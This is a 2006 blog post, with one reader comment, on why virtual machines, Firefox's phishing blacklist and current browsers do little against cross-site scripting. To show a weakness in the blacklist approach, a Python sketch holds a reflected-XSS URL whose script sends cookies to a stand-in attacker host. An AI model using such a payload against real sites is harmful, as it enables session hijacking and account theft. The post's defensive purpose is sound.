RETURN $ecure;

Security, Technology and Life

Client-Side protection from XSS


Earlier today, on the sla.ckers.org forums, there was mention of virtual machines, anti-phishing toolbars and XSS. This got me thinking about what users can do to protect themselves from phishing and other XSS-induced troubles. Now, a virtual machine may protect you from viruses, but it does nothing for XSS: the cookies for your virtual machine's browser are still accessible from within that virtual machine. RSnake mentioned it could prevent intranet scanning, so perhaps virtual machines could be useful in a corporate setting. As I said on the forums…

I would browse from inside a virtual machine, but if it's a virus, I will reformat. If it's XSS, my info is gone anyway.

But what about other protection? Firefox 2.0 has an anti-phishing feature. How does this work exactly?

Phishing Protection is turned on by default in Firefox 2, and works by checking the sites that you browse to against a list of known phishing sites. This list is automatically downloaded and regularly updated within Firefox 2 when the Phishing Protection feature is enabled. Since phishing attacks can occur very quickly, there’s also an option to check the sites you browse to against an online service such as Google for more up-to-date protection. This enhanced capability can be turned on via the Security preferences pane.

So, basically it checks the domain against a list of known phishing sites. Great, but again, it does nothing against XSS. A site you regularly browse that is vulnerable to XSS will be seen as a non-phishing site because of its domain name ( site.com/search/<xss> ), but the script will still execute and your information, again, is lost! A great feature against ordinary phishing attempts, though.
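To make that concrete, here is a minimal sketch of a domain-based blacklist check like the one described above. Everything here is made up for illustration (the blacklist entries, the function name, the example URLs); the point is only that the check consults the hostname and never looks at the path or query string, so a reflected-XSS URL on a trusted domain sails right through:

```python
from urllib.parse import urlparse

# Hypothetical blacklist of known phishing domains, standing in for
# the list Firefox 2 downloads (these domains are invented).
PHISHING_DOMAINS = {"paypa1-login.example", "secure-bank.example"}

def is_flagged(url: str) -> bool:
    """Return True if the URL's host is on the phishing blacklist."""
    host = urlparse(url).hostname or ""
    return host in PHISHING_DOMAINS

# A reflected-XSS URL on a legitimate, trusted domain: the payload
# rides in the query string, which the domain check never inspects.
evil = ("http://site.com/search?q=<script>document.location="
        "'http://attacker.example/steal?c='+document.cookie</script>")

print(is_flagged("http://paypa1-login.example/login"))  # True  - caught
print(is_flagged(evil))                                 # False - not caught
```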

So, perhaps protection at the browser level? Nope, not there. The only browser even close is Opera, which detects invalid domain characters in the address bar. But they seem to have no interest in expanding that 'feature' to hinder XSS. I suggested it to the MozillaZine community, even with help from RSnake, and they didn't exactly jump on the idea either.

So, it boils down to this simple fact: for now, we are totally dependent on web developers to be aware of the security risks and to use good development practices.
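The heart of that good practice is output encoding: escape user-supplied data before reflecting it back into the page, so injected markup renders as inert text. A minimal sketch in Python (the function name and page snippet are mine, not from any particular framework):

```python
import html

def render_search_results(query: str) -> str:
    """Reflect the user's search query into the page, HTML-escaped so
    any injected tags come out as harmless text, not live script."""
    safe = html.escape(query, quote=True)
    return f"<p>Results for: {safe}</p>"

# The classic reflected-XSS payload is neutralized on output.
payload = "<script>alert(document.cookie)</script>"
page = render_search_results(payload)
print(page)
# No live <script> tag survives; the browser just displays the text.
```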


Written by Rodney G

10/11/2006 at 7:31 pm

Posted in Uncategorized


One Response

Subscribe to comments with RSS.

  1. I think browsers are going to need to help with the reflected XSS and CSRF problems. I posted a proposal on how web sites could tell browsers what kind of cross-site linking was expected to the webappsec list at one point, and it turned out that Ivan Ristic had written up some notes in a similar vein (only his ideas go much further…)

    CSL Policy: http://www.webappsec.org/lists/websecurity/archive/2006-06/msg00070.html

    Secure Browsing Mode:
    http://www.webappsec.org/lists/websecurity/archive/2006-06/msg00085.html

    Brian

    10/13/2006 at 2:05 pm

